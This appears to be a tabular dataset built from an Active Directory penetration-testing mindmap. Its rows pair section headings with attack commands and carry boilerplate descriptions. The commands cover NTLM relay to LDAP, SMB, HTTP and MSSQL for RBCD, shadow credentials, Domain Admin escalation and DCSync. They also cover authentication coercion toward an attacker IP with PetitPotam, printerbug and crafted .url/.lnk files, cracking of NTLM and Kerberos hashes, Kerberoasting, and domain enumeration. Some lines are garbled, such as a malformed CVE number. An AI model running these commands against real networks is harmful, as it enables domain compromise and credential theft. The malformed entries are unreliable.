instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
NTLM relay
HTTP(S) -> LDAP(S)
Note or procedural step under 'NTLM relay'.
NTLM relay
Usually from webdev coerce
Note or procedural step under 'NTLM relay'.
NTLM relay > To LDAP(S)
Relay to LDAP if LDAP signing and LDAPS channel binding not enfoeced (default)
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --add-computer <computer_name> <computer_password> --delegate-access #RBCD
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --shadow-credentials --shadow-target '<dc_name$>' #Shadow Credentials
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --escalate-user <user> #Domain Admin
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S)
ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL
Note or procedural step under 'NTLM relay > To LDAP(S)'.
NTLM relay > To LDAP(S) > To SMB
Relay to SMB (if SMB is not signed)
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'.
NTLM relay > To LDAP(S) > To SMB
Find SMB not signed targets (default if not a Domain controler)
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'.
NTLM relay > To LDAP(S) > To SMB
nxc smb <ip_range> --gen-relay-list smb_unsigned_ips.txt
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
NTLM relay > To LDAP(S) > To SMB
ntlmrelayx.py -tf smb_unsigned_ips.txt -smb2support [--ipv6] -socks #SMB Socks
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP
Relay to CA web enrollement
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP
Relay to WSUS
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL
ntlmrelayx.py -t mssql://<ip> [-smb2support] -socks
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
Zero-Logon (safe method) (CVE-202-1472)
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
Relay one dc to another
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
ntlmrelayx.py -t dcsync://<dc_to_ip> -smb2support -auth-smb <user>:<password>
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
To HTTP
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON
krbrelayx.py -t 'http://<pki>/certsrv/certfnsh.asp' --adcs --template DomainController -v '<target_netbios>$' -ip <attacker_ip>
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB
same as NTLM relay, use krbrelayx.py
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB'.
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)
same as NTLM relay, use krbrelayx.py
Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)'.
LM (299bd128c1101fd6)
john --format=lm hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'LM (299bd128c1101fd6)'.
LM (299bd128c1101fd6)
hashcat -m 3000 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'LM (299bd128c1101fd6)'.
NT (b4b9b02e6f09a9bd760...)
john --format=nt hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'.
NT (b4b9b02e6f09a9bd760...)
hashcat -m 1000 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'.
NTLMv1 (user::85D5BC...)
john --format=netntlm hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'NTLMv1 (user::85D5BC...)'.
NTLMv1 (user::85D5BC...)
hashcat -m 1000 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'NTLMv1 (user::85D5BC...)'.
NTLMv1 (user::85D5BC...)
crack.sh
Note or procedural step under 'NTLMv1 (user::85D5BC...)'.
NTLMv2 (user::N46iSNek...)
john --format=netntlmv2 hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'.
NTLMv2 (user::N46iSNek...)
hashcat -m 5600 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'.
Kerberos 5 TGS ($krb5tgs$23$...)
john --format=krb5tgs hash.txt --wordlist=<rockyou.txt>
Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'.
Kerberos 5 TGS ($krb5tgs$23$...)
hashcat -m 13100 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'.
($krb5tgs$17...)
hashcat -m 19600 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under '($krb5tgs$17...)'.
Kerberos ASREP ($krb5asrep$23...)
hashcat -m 18200 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'Kerberos ASREP ($krb5asrep$23...)'.
($DCC2$10240...)
hashcat -m 2100 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under '($DCC2$10240...)'.
($DCC2$10240...)
Timeroast hash ($sntp-ms$...)
Note or procedural step under '($DCC2$10240...)'.
($DCC2$10240...)
hashcat -m 31300 -a 3 hash.txt -w 3 ?l?l?l?l?l?l?l
Tool or command referenced under '($DCC2$10240...)'.
pxe hash ($sccm$aes128$...)
hashcat -m 19850 -a 0 hash.txt <rockyou.txt>
Tool or command referenced under 'pxe hash ($sccm$aes128$...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Find all users
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
nxc smb <dc_ip> -u '<user>' -p '<password>' --users
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Classic Enumeration (users, shares, ACL, delegation, ...)
Enumerate SMB share
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
nxc smb <ip_range> -u '<user>' -p '<password>' -M spider_plus
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Classic Enumeration (users, shares, ACL, delegation, ...)
xc smb <ip_range> -u '<user>' -p '<password>' --shares [--get-file \\<filename> <filename>]
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
manspider <ip_range> -c passw -e <file extensions> -d <domain> -u <user> -p <password>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Bloodhound Legacy
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain <domain>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
sharphound.exe -c all -d <domain>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Bloodhound CE
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
rusthound-ce -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z --ldap-filter=(objectGuid=*)
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
sharphound.exe -c all -d <domain>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
SOAPHound.exe -c c:\temp\cache.txt --bhdump -o c:\temp\bloodhound-output --autosplit --threshold 900
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Enumerate Ldap
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
ldeep ldap -u <users> -p '<password>' -d <domain> -s ldap://<dc_ip> all <backup_folder>
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
ldapdomaindump.py -u <user> -p <password> -o <dump_folder> ldap://<dc_ip>:389
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
ldapsearch-ad.py -l <dc_ip> -d <domain> -u <user> -p '<password>' -o <output.log> -t all
Tool or command referenced under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
Enumerate DNS
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Classic Enumeration (users, shares, ACL, delegation, ...)
adidnsdump -u <domain>\\<user> -p "<password>" --print-zones <dc_ip> #New targets (low hanging fruit)
Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'.
Enumerate ADCS
certify.exe find
Note or procedural step under 'Enumerate ADCS'.
Enumerate ADCS
certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc_ip>
Note or procedural step under 'Enumerate ADCS'.
Enumerate SCCM
sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug
Note or procedural step under 'Enumerate SCCM'.
Enumerate SCCM
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm
Note or procedural step under 'Enumerate SCCM'.
Enumerate SCCM
SharpSCCM.exe local site-info
Note or procedural step under 'Enumerate SCCM'.
Scan Auto
from BH result
Note or procedural step under 'Scan Auto'.
Scan Auto
AD-miner -c -cf Report -u <neo4j_username> -p <neo4j_password>
Note or procedural step under 'Scan Auto'.
Scan Auto
PingCastle.exe --healthcheck --server <domain>
Note or procedural step under 'Scan Auto'.
Scan Auto
Import-Module .\adPEAS.ps1; Invoke-adPEAS -Domain '<domain>' -Server '<dc_fqdn>'
Note or procedural step under 'Scan Auto'.
Kerberoasting
MATCH (u:User) WHERE u.hasspn=true AND u.enabled = true AND NOT u.objectid ENDS WITH '-502' AND NOT COALESCE(u.gmsa, false) = true AND NOT COALESCE(u.msa, false) = true RETURN u
Note or procedural step under 'Kerberoasting'.
Kerberoasting
GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
Tool or command referenced under 'Kerberoasting'.
Kerberoasting
Rubeus.exe kerberoast
Tool or command referenced under 'Kerberoasting'.
Coerce
Drop file
Note or procedural step under 'Coerce'.
Coerce
.lnk
Note or procedural step under 'Coerce'.
Coerce
nxc smb <dc_ip> -u '<user>' -p '<password>' -M slinky -o NAME=<filename> SERVER=<attacker_ip>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Coerce
.scf
Note or procedural step under 'Coerce'.
Coerce
nxc smb <dc_ip> -u '<user>' -p '<password>' -M sucffy -o NAME=<filename> SERVER=<attacker_ip>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Coerce
.url
Note or procedural step under 'Coerce'.
Coerce
[InternetShortcut]... IconFile=\\<attacker_ip>\%USERNAME%.icon
Note or procedural step under 'Coerce'.
Coerce
Other files
Note or procedural step under 'Coerce'.
Coerce
ntlm_theft.py -g all -s <your_ip> -f test
Note or procedural step under 'Coerce'.
Coerce
Webdav
Note or procedural step under 'Coerce'.
Coerce
Enable webclient
Note or procedural step under 'Coerce'.
Coerce
.searchConnector-ms
Note or procedural step under 'Coerce'.
Coerce
nxc smb <dc_ip> -u '<user>' -p '<password>' -M drop-sc
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Coerce
add attack computer in dns
Note or procedural step under 'Coerce'.
Coerce
dnstool.py -u <domain>\<user> -p <pass> --record <attack_name> --action add --data <ip_attacker> <dc_ip>
Note or procedural step under 'Coerce'.
Coerce
Launch coerce with <attacker_hostname>@80/x as target
Note or procedural step under 'Coerce'.
Coerce
RPC call
Note or procedural step under 'Coerce'.
Coerce
printerbug.py <domain>/<username>:<password>@<printer_ip> <listener_ip>
Note or procedural step under 'Coerce'.
Coerce
petitpotam.py -d <domain> -u <user> -p <password> <listnerer_ip> <target_ip>
Note or procedural step under 'Coerce'.
Coerce
coercer.py -d <domain> -u <user> -p <password> -t <target> -l <attacker_ip>
Note or procedural step under 'Coerce'.
Coerce
Coerce kerberos
Note or procedural step under 'Coerce'.
Coerce
dnstool.py -u "<domain>\<user>" -p '<password>' -d "<attacker_ip>" --action add "<dns_server_ip>" -r "<servername>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" --tcp
Note or procedural step under 'Coerce'.
Coerce
petitpotam.py -u '<user>' -p '<password>' -d <domain> '<servername>1UWh...' <target>
Note or procedural step under 'Coerce'.
Intra ID Connect
Find MSOL
Note or procedural step under 'Intra ID Connect'.
Intra ID Connect
nxc ldap <dc_ip> -u '<user>' -p '<password>' -M get-desc-users |grep -i MSOL
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Can Connect to a computer
Lateral move
Note or procedural step under 'Can Connect to a computer'.
Exploit
know vulnerabilities
Note or procedural step under 'Exploit'.